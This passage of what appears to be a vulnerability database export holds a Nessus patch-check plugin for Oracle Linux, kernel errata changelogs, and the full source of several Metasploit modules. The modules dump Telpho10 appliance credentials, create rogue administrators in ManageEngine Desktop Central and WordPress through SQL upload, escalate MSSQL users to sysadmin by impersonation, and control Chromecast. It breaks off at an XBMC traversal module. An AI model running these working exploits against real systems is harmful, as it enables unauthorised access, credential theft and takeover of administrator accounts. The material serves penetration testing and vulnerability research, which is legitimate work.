thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-14106\", \"CVE-2017-16525\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-6951\", \"CVE-2017-7482\", \"CVE-2017-8824\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4041\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.298.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.298.3.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:07", "bulletinFamily": "unix", "description": "[2.6.39-400.298.3]\n- ext4: limit group search loop for non-extent files (Lachlan McIlroy) [Orabug: 17488415] \n- ext4: fixup 64-bit divides in 3.0-stable backport of upstream fix (Todd Poynor) [Orabug: 17488415] \n- ext4: use atomic64_t for the per-flexbg free_clusters count (Theodore Ts'o) [Orabug: 17488415] \n- ext4: init pagevec in ext4_da_block_invalidatepages (Eric Sandeen) [Orabug: 17488415] \n- ext4: do not try to write superblock on ro remount w/o journal (Michael Tokarev) [Orabug: 17488415] \n- xen-netback: fix grant_copy_op array size (Niranjan Patil) [Orabug: 25653941] \n- xen-netback: explicitly check max_slots_needed against meta_prod counter (Niranjan Patil) [Orabug: 25653941] \n- xen-netback: Fix handling of skbs requiring too many slots (Zoltan Kiss) [Orabug: 25653941] \n- xen-netback: worse-case estimate in xenvif_rx_action is underestimating (Paul Durrant) [Orabug: 25653941] \n- xen-netback: Add worse-case estimates of max_slots_needed in netbk_rx_action (Niranjan Patil) [Orabug: 25653941] \n- KEYS: Remove key_type::match in favour of overriding default by match_preparse (Tim Tianyang Chen) [Orabug: 25757946] {CVE-2017-6951}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26737475] \n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813391] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880520] {CVE-2017-7482} {CVE-2017-7482}\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 27099836] \n- Check validity of cl_rpcclient in nfs_server_list_show (Malahal Naineni) [Orabug: 27112186] \n- USB: serial: console: fix use-after-free after failed setup (Johan Hovold) [Orabug: 27206839] {CVE-2017-16525}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor (Takashi Iwai) [Orabug: 27206934] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) [Orabug: 27207243] {CVE-2017-16531}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290308] {CVE-2017-8824}", "modified": "2018-02-26T00:00:00", "published": "2018-02-26T00:00:00", "id": "ELSA-2018-4041", "href": "http://linux.oracle.com/errata/ELSA-2018-4041.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:37", "bulletinFamily": "unix", "description": "kernel-uek\n[3.8.13-118.20.3]\n- gre: fix a possible skb leak (Eric Dumazet) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Fix leak in ipv6_gso_segment(). (David S. Miller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403972] {CVE-2017-9074}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813390] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880517] {CVE-2017-7482} {CVE-2017-7482}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26883322] \n- KVM: x86: fix deadlock in clock-in-progress request handling (Marcelo Tosatti) [Orabug: 27065995] \n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 27099835] \n- USB: serial: console: fix use-after-free after failed setup (Johan Hovold) [Orabug: 27206837] {CVE-2017-16525}\n- uwb: properly check kthread_run return value (Andrey Konovalov) [Orabug: 27206897] {CVE-2017-16526}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor (Takashi Iwai) [Orabug: 27206928] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) [Orabug: 27207240] {CVE-2017-16531}\n- USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor() (Alan Stern) [Orabug: 27207983] {CVE-2017-16535}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290301] {CVE-2017-8824}", "modified": "2018-02-26T00:00:00", "published": "2018-02-26T00:00:00", "id": "ELSA-2018-4040", "href": "http://linux.oracle.com/errata/ELSA-2018-4040.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-02T01:11:27", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system appliance. This module generates a configuration backup of Telpho10, downloads the file and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.\n", "modified": "2019-09-23T14:29:38", "published": "2016-10-24T13:20:08", "id": "MSF:AUXILIARY/ADMIN/HTTP/TELPHO10_CREDENTIAL_DUMP", "href": "", "type": "metasploit", "title": "Telpho10 Backup Credentials Dumper", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Telpho10 Backup Credentials Dumper',\n 'Description' => %q{\n This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.\n },\n 'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module\n 'License' => MSF_LICENSE,\n 'References' => ['URL', 'https://github.com/whoot/TelpOWN'],\n 'Platform' => 'linux',\n 'Privileged' => false,\n 'DisclosureDate' => 'Sep 2 2016'))\n\n register_options(\n [\n Opt::RPORT(80)\n ])\n end\n\n # Used for unpacking backup files\n def untar(tarfile)\n destination = tarfile.split('.tar').first\n FileUtils.mkdir_p(destination)\n File.open(tarfile, 'rb') do |file|\n Rex::Tar::Reader.new(file) do |tar|\n tar.each do |entry|\n dest = File.join destination, entry.full_name\n if entry.file?\n File.open(dest, 'wb') do |f|\n f.write(entry.read)\n end\n File.chmod(entry.header.mode, dest)\n end\n end\n end\n end\n return destination\n end\n\n # search for credentials in backup file\n def dump_creds(mysql_file)\n file = File.new(mysql_file, 'r')\n while (line = file.gets)\n if line.include? 'adminusername'\n config = [line]\n end\n end\n file.close\n\n print_status('Login (/telpho/login.php)')\n print_status('-------------------------')\n print_good(\"Username: #{config.first[/adminusername\\',\\'(.*?)\\'/, 1]}\")\n print_good(\"Password: #{config.first[/adminpassword\\',\\'(.*?)\\'/, 1]}\\n\")\n\n print_status('MySQL (/phpmyadmin)')\n print_status('-------------------')\n print_good('Username: root')\n print_good(\"Password: #{config.first[/dbpassword\\',\\'(.*?)\\'/, 1]}\\n\")\n\n print_status('LDAP (/phpldapadmin)')\n print_status('--------------------')\n print_good('Username: cn=admin,dc=localdomain')\n print_good(\"Password: #{config.first[/ldappassword\\',\\'(.*?)\\'/, 1]}\\n\")\n\n print_status('Asterisk MI (port 5038)')\n print_status('-----------------------')\n print_good(\"Username: #{config.first[/manageruser\\',\\'(.*?)\\'/, 1]}\")\n print_good(\"Password: #{config.first[/managersecret\\',\\'(.*?)\\'/, 1]}\\n\")\n\n print_status('Mail configuration')\n print_status('------------------')\n print_good(\"Mailserver: #{config.first[/ipsmarthost\\',\\'(.*?)\\'/, 1]}\")\n print_good(\"Username: #{config.first[/mailusername\\',\\'(.*?)\\'/, 1]}\")\n print_good(\"Password: #{config.first[/mailpassword\\',\\'(.*?)\\'/, 1]}\")\n print_good(\"Mail from: #{config.first[/mailfrom\\',\\'(.*?)\\'/, 1]}\\n\")\n\n print_status('Online Backup')\n print_status('-------------')\n print_good(\"ID: #{config.first[/ftpbackupid\\',\\'(.*?)\\'/, 1]}\")\n print_good(\"Password: #{config.first[/ftpbackuppw\\',\\'(.*?)\\'/, 1]}\\n\")\n\n end\n\n def run\n res = send_request_cgi({\n 'uri' => '/telpho/system/backup.php',\n 'method' => 'GET'\n })\n if res && res.code == 200\n print_status('Generating backup')\n sleep(1)\n else\n print_error(\"Could not find vulnerable script. Aborting.\")\n return nil\n end\n\n print_status('Downloading backup')\n res = send_request_cgi({\n 'uri' => '/telpho/temp/telpho10.epb',\n 'method' => 'GET'\n })\n if res && res.code == 200\n if res.body.to_s.bytesize == 0\n print_error('0 bytes returned, file does not exist or is empty.')\n return nil\n end\n\n path = store_loot(\n 'telpho10.backup',\n 'application/x-compressed',\n datastore['RHOST'],\n res.body,\n 'backup.tar'\n )\n print_good(\"File saved in: #{path}\")\n\n begin\n extracted = untar(\"#{path}\")\n mysql = untar(\"#{extracted}/mysql.tar\")\n rescue\n print_error('Could not unpack files.')\n return nil\n end\n begin\n print_status(\"Dumping credentials\\n\")\n dump_creds(\"#{mysql}/mysql.epb\")\n rescue\n print_error('Could not find credential file.')\n return nil\n end\n else\n print_error('Failed to download backup file.')\n return nil\n end\n rescue ::Rex::ConnectionError\n print_error(\"#{rhost}:#{rport} - Failed to connect\")\n return nil\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/telpho10_credential_dump.rb"}, {"lastseen": "2019-12-07T15:13:42", "bulletinFamily": "exploit", "description": "This module exploits an administrator account creation vulnerability in Desktop Central from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in several versions of Desktop Central (including MSP) from v7 onwards.\n", "modified": "2018-09-15T23:54:45", "published": "2015-01-05T05:14:12", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANAGE_ENGINE_DC_CREATE_ADMIN", "href": "", "type": "metasploit", "title": "ManageEngine Desktop Central Administrator Account Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Administrator Account Creation',\n 'Description' => %q{\n This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-7862'],\n ['OSVDB', '116554'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/2'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],\n ],\n 'DisclosureDate' => 'Dec 31 2014'))\n\n register_options(\n [\n OptPort.new('RPORT', [true, 'The target port', 8020]),\n OptString.new('TARGETURI', [ true, 'ManageEngine Desktop Central URI', '/']),\n OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),\n OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),\n OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])\n ])\n end\n\n\n def run\n # Generate password hash\n salt = Time.now.to_i.to_s\n password_encoded = Rex::Text.encode_base64([Rex::Text.md5(datastore['PASSWORD'] + salt)].pack('H*'))\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, \"/servlets/DCPluginServelet\"),\n 'method' =>'GET',\n 'vars_get' => {\n 'action' => 'addPlugInUser',\n 'role' => 'DCAdmin',\n 'userName' => datastore['USERNAME'],\n 'email' => datastore['EMAIL'],\n 'phNumber' => Rex::Text.rand_text_numeric(6),\n 'password' => password_encoded,\n 'salt' => salt,\n 'createdtime' => salt\n }\n })\n\n # Yes, \"sucess\" is really mispelt, as is \"Servelet\" ... !\n unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/\n print_error(\"Administrator account creation failed\")\n end\n\n print_good(\"Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n connection_details = {\n module_fullname: self.fullname,\n username: datastore['USERNAME'],\n private_data: datastore['PASSWORD'],\n private_type: :password,\n workspace_id: myworkspace_id,\n access_level: 'Administrator',\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb"}, {"lastseen": "2019-11-23T03:01:17", "bulletinFamily": "exploit", "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-10T22:58:46", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ESCALATE_EXECUTE_AS", "href": "", "type": "metasploit", "title": "Microsoft SQL Server Escalate EXECUTE AS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server Escalate EXECUTE AS',\n 'Description' => %q{\n This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]\n ))\n end\n\n def run\n # Check connection and issue initial query\n print_status(\"Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...\")\n if mssql_login_datastore\n print_good('Connected.')\n else\n print_error('Login was unsuccessful. Check your credentials.')\n disconnect\n return\n end\n\n # Query for sysadmin status\n print_status(\"Checking if #{datastore['USERNAME']} has the sysadmin role...\")\n user_status = check_sysadmin\n\n # Check if user has sysadmin role\n if user_status == 1\n print_good(\"#{datastore['USERNAME']} has the sysadmin role, no escalation required.\")\n disconnect\n return\n else\n print_status(\"You're NOT a sysadmin, let's try to change that.\")\n end\n\n # Get a list of the users that can be impersonated\n print_status(\"Enumerating a list of users that can be impersonated...\")\n imp_user_list = check_imp_users\n if imp_user_list.nil? || imp_user_list.length == 0\n print_error('Sorry, the current user doesn\\'t have permissions to impersonate anyone.')\n disconnect\n return\n else\n # Display list of users that can be impersonated\n print_good(\"#{imp_user_list.length} users can be impersonated:\")\n imp_user_list.each do |db|\n print_status(\" - #{db[0]}\")\n end\n end\n\n # Check if any of the users that can be impersonated are sysadmins\n print_status('Checking if any of them are sysadmins...')\n imp_user_sysadmin = check_imp_sysadmin(imp_user_list)\n if imp_user_sysadmin.nil?\n print_error('Sorry, none of the users that can be impersonated are sysadmins.')\n disconnect\n return\n end\n\n # Attempt to escalate to sysadmin\n print_status(\"Attempting to impersonate #{imp_user_sysadmin[0]}...\")\n escalate_status = escalate_privs(imp_user_sysadmin[0])\n if escalate_status\n # Check if escalation was successful\n user_status = check_sysadmin\n if user_status == 1\n print_good(\"Congrats, #{datastore['USERNAME']} is now a sysadmin!.\")\n else\n print_error('Fail buckets, something went wrong.')\n end\n else\n print_error('Error while trying to escalate privileges.')\n end\n\n disconnect\n return\n end\n\n # Checks if user is a sysadmin\n def check_sysadmin\n # Setup query to check for sysadmin\n sql = \"select is_srvrolemember('sysadmin') as IsSysAdmin\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse query results\n parse_results = result[:rows]\n status = parse_results[0][0]\n\n # Return status\n return status\n end\n\n # Gets trusted databases owned by sysadmins\n def check_imp_users\n # Setup query\n sql = \"SELECT DISTINCT b.name\n FROM sys.server_permissions a\n INNER JOIN sys.server_principals b\n ON a.grantor_principal_id = b.principal_id\n WHERE a.permission_name = 'IMPERSONATE'\"\n\n result = mssql_query(sql)\n\n # Return on success\n return result[:rows]\n end\n\n # Checks if user has the db_owner role\n def check_imp_sysadmin(trust_db_list)\n # Check if the user has the db_owner role is any databases\n trust_db_list.each do |imp_user|\n # Setup query\n sql = \"select IS_SRVROLEMEMBER('sysadmin','#{imp_user[0]}') as status\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse query results\n parse_results = result[:rows]\n status = parse_results[0][0]\n if status == 1\n print_good(\" - #{imp_user[0]} is a sysadmin!\")\n return imp_user\n else\n print_status(\" - #{imp_user[0]} is NOT sysadmin!\")\n end\n end\n nil\n end\n\n def escalate_privs(imp_user_sysadmin)\n # Impersonate the first sysadmin user on the list\n evil_sql_create = \"EXECUTE AS Login = '#{imp_user_sysadmin}';\n EXEC sp_addsrvrolemember '#{datastore['USERNAME']}','sysadmin';\"\n\n mssql_query(evil_sql_create)\n\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb"}, {"lastseen": "2019-11-25T22:52:31", "bulletinFamily": "exploit", "description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download a SQL dump of the plugins database tables. It's also possible to upload files containing SQL statements which will be executed. The module first tries to extract the WordPress table prefix from the dump and then attempts to create a new admin user.\n", "modified": "2017-07-24T13:26:21", "published": "2014-09-27T11:42:49", "id": "MSF:AUXILIARY/ADMIN/HTTP/WP_CUSTOM_CONTACT_FORMS", "href": "", "type": "metasploit", "title": "WordPress custom-contact-forms Plugin SQL Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress custom-contact-forms Plugin SQL Upload',\n 'Description' => %q{\n The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.\n },\n 'Author' =>\n [\n 'Marc-Alexandre Montpas', # Vulnerability discovery\n 'Christian Mehlmauer' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ],\n [ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],\n [ 'WPVDB', '7542' ]\n ],\n 'DisclosureDate' => 'Aug 07 2014'\n ))\n end\n\n def get_sql(table_prefix, username, password)\n # create user\n sql = \"INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');\"\n # make user administrator\n sql << \"INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}capabilities','a:1:{s:13:\\\"administrator\\\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}user_level','10');\"\n\n sql\n end\n\n def get_table_prefix\n res = send_request_cgi({\n 'uri' => wordpress_url_admin_post,\n 'method' => 'POST',\n 'vars_post' => {\n 'ccf_export' => \"1\"\n }\n })\n return nil if res.nil? || res.code != 302 || res.headers['Location'] !~ /\\.sql$/\n\n file = res.headers['Location']\n res_file = send_request_cgi('uri' => file)\n return nil if res_file.nil? || res_file.code != 200 || res_file.body.nil?\n\n match = res_file.body.match(/insert into `(.+_)customcontactforms_fields`/i)\n return nil if match.nil? || match.length < 2\n\n table_prefix = match[1]\n table_prefix\n end\n\n def run\n username = Rex::Text.rand_text_alpha(10)\n password = Rex::Text.rand_text_alpha(20)\n\n print_status(\"Trying to get table_prefix\")\n table_prefix = get_table_prefix\n if table_prefix.nil?\n print_error(\"Unable to get table_prefix\")\n return\n else\n print_status(\"got table_prefix '#{table_prefix}'\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(get_sql(table_prefix, username, password), 'text/plain', nil, \"form-data; name=\\\"import_file\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(5)}.sql\\\"\")\n data.add_part('1', nil, nil, 'form-data; name=\"ccf_merge_import\"')\n post_data = data.to_s\n\n print_status(\"Inserting user #{username} with password #{password}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => wordpress_url_admin_post,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n if res.nil? || res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'\n fail_with(Failure::UnexpectedReply, \"#{peer} - Upload failed\")\n end\n\n # test login\n cookie = wordpress_login(username, password)\n\n # login successful\n if cookie\n print_good(\"User #{username} with password #{password} successfully created\")\n store_valid_credential(user: username, private: password, proof: cookie)\n else\n print_error(\"User creation failed\")\n return\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/wp_custom_contact_forms.rb"}, {"lastseen": "2019-11-15T00:01:37", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for Chromecast YouTube. Only the deprecated DIAL protocol is supported by this module. Casting via the newer CASTV2 protocol is unsupported at this time.\n", "modified": "2019-05-29T17:19:52", "published": "2014-06-10T04:38:26", "id": "MSF:AUXILIARY/ADMIN/CHROMECAST/CHROMECAST_YOUTUBE", "href": "", "type": "metasploit", "title": "Chromecast YouTube Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Chromecast YouTube Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.\n },\n 'Author' => ['wvu'],\n 'References' => [\n ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Play', 'Description' => 'Play video'],\n ['Stop', 'Description' => 'Stop video']\n ],\n 'DefaultAction' => 'Play'\n ))\n\n register_options([\n Opt::RPORT(8008),\n OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])\n ])\n end\n\n def run\n vid = datastore['VID']\n\n case action.name\n when 'Play'\n res = play(vid)\n when 'Stop'\n res = stop\n end\n\n return unless res\n\n case res.code\n when 201\n print_good(\"Playing https://www.youtube.com/watch?v=#{vid}\")\n when 200\n print_status('Stopping video')\n when 404\n print_error('Target no longer supports casting via the DIAL protocol. ' \\\n 'CASTV2 is not supported by this module at this time.')\n end\n end\n\n def play(vid)\n begin\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/apps/YouTube',\n 'agent' => Rex::Text.rand_text_english(rand(42) + 1),\n 'vars_post' => {\n 'v' => vid\n }\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n ensure\n disconnect\n end\n end\n\n def stop\n begin\n send_request_raw(\n 'method' => 'DELETE',\n 'uri' => '/apps/YouTube',\n 'agent' => Rex::Text.rand_text_english(rand(42) + 1)\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/chromecast/chromecast_youtube.rb"}, {"lastseen": "2019-11-26T04:51:14", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build. The module can only be used to retrieve files.\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-23T15:09:23", "id": "MSF:AUXILIARY/GATHER/XBMC_TRAVERSAL", "href": "", "type": "metasploit", "title": "XBMC Web Server Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"XBMC Web Server Directory Traversal\",\n 'Description' => %q{\n This module exploits a directory 